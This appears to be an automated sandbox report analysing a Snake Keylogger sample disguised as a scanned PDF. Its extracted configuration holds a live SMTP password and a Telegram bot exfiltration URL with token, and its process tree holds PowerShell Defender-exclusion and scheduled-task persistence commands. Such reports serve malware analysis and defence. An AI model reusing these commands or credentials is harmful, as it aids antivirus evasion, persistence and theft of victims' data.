Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-10-2024 03:56
Static task
static1
Behavioral task
behavioral1
Sample
SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe
Resource
win10v2004-20241007-en
General
-
Target
SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe
-
Size
886KB
-
MD5
e22f1bbf54fbbd8d0135772dac71ac13
-
SHA1
b44ed322c53cb34c9eb7988c65be76eb7c78f089
-
SHA256
9e4e77d4f212e5aad71c2a0409c801b64e89b9f92a0ce4e2903b587bc5a70485
-
SHA512
2e577425a1d81e682777ae7b8c0dd9718923f6c0b2367a0096b7aa803bfb21eb02a4ded17600f6f9767b5ab853ddff56ebd8b39dd0ab8da341257d2e50aa3d58
-
SSDEEP
24576:14njPTfWh2y0ukcncNmGgvYTDn2KSQjHT5GA2ekyFh3C0cq:mmGhDneeQHMh3C0cq
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.vlccwellness.com - Port:
587 - Username:
[email protected] - Password:
taiyab31121984 - Email To:
[email protected]
https://api.telegram.org/bot1865023387:AAFbWPISsv486p_o9A4CIDR1FBfAq1W7nUc/sendMessage?chat_id=1788371409
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 5 IoCs
resource yara_rule behavioral1/memory/2660-30-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2660-31-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2660-29-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2660-26-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger behavioral1/memory/2660-24-0x0000000000400000-0x0000000000424000-memory.dmp family_snakekeylogger -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2824 powershell.exe 2804 powershell.exe 2628 powershell.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 checkip.dyndns.org 8 freegeoip.app 9 freegeoip.app -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2552 set thread context of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1316 2660 WerFault.exe 38 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2204 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2660 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 2628 powershell.exe 2824 powershell.exe 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2660 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2552 wrote to memory of 2824 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 31 PID 2552 wrote to memory of 2824 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 31 PID 2552 wrote to memory of 2824 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 31 PID 2552 wrote to memory of 2824 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 31 PID 2552 wrote to memory of 2804 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 33 PID 2552 wrote to memory of 2804 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 33 PID 2552 wrote to memory of 2804 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 33 PID 2552 wrote to memory of 2804 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 33 PID 2552 wrote to memory of 2204 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 34 PID 2552 wrote to memory of 2204 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 34 PID 2552 wrote to memory of 2204 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 34 PID 2552 wrote to memory of 2204 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 34 PID 2552 wrote to memory of 2628 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 37 PID 2552 wrote to memory of 2628 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 37 PID 2552 wrote to memory of 2628 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 37 PID 2552 wrote to memory of 2628 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 37 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2552 wrote to memory of 2660 2552 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 38 PID 2660 wrote to memory of 1316 2660 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 40 PID 2660 wrote to memory of 1316 2660 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 40 PID 2660 wrote to memory of 1316 2660 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 40 PID 2660 wrote to memory of 1316 2660 SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe"C:\Users\Admin\AppData\Local\Temp\SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NEQcsxsAehXEc.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NEQcsxsAehXEc" /XML "C:\Users\Admin\AppData\Local\Temp\tmp77A0.tmp"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\NEQcsxsAehXEc.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Users\Admin\AppData\Local\Temp\SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe"C:\Users\Admin\AppData\Local\Temp\SCANNED_DOCUMENT_8D23259F053446A0A1C0ED3F526B0C7B_PDF.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 15723⤵
- Program crash
PID:1316
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c4cc32791a69408b72a11ace9068761c
SHA1fb89919623953fccbb6bcfa953017447924bf407
SHA256fee0bd75b10c9a1f432e31dc4d26ce07a6d9a459b56aa68d6c07e79b906a73ba
SHA512ece4d75ea830a3f4a2f9c5cfd47587846f078c2ee9bf5d7a105ce51538a5c98323a4101f160976aba387a446a7fbe2b97125d69d9cb0f8ddd48accc2849e18b5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD587e49fbb868cf9054f66d87912171af1
SHA19a3d4bb5b53d5311619f6c4806858d8f40e96952
SHA25637ea2031cb487f6112ad81202609a014bfc77a4418417e93c28e8fbb4c881666
SHA512ca4fa5d8144ce17fdc5d6ae8749958491d6fde9beab3c07909d58ca5591e1ce1f540a1f2e2d9bfcd6401d5b6417dfc59988bbfd6e3dfc0e8727d836786f1e59c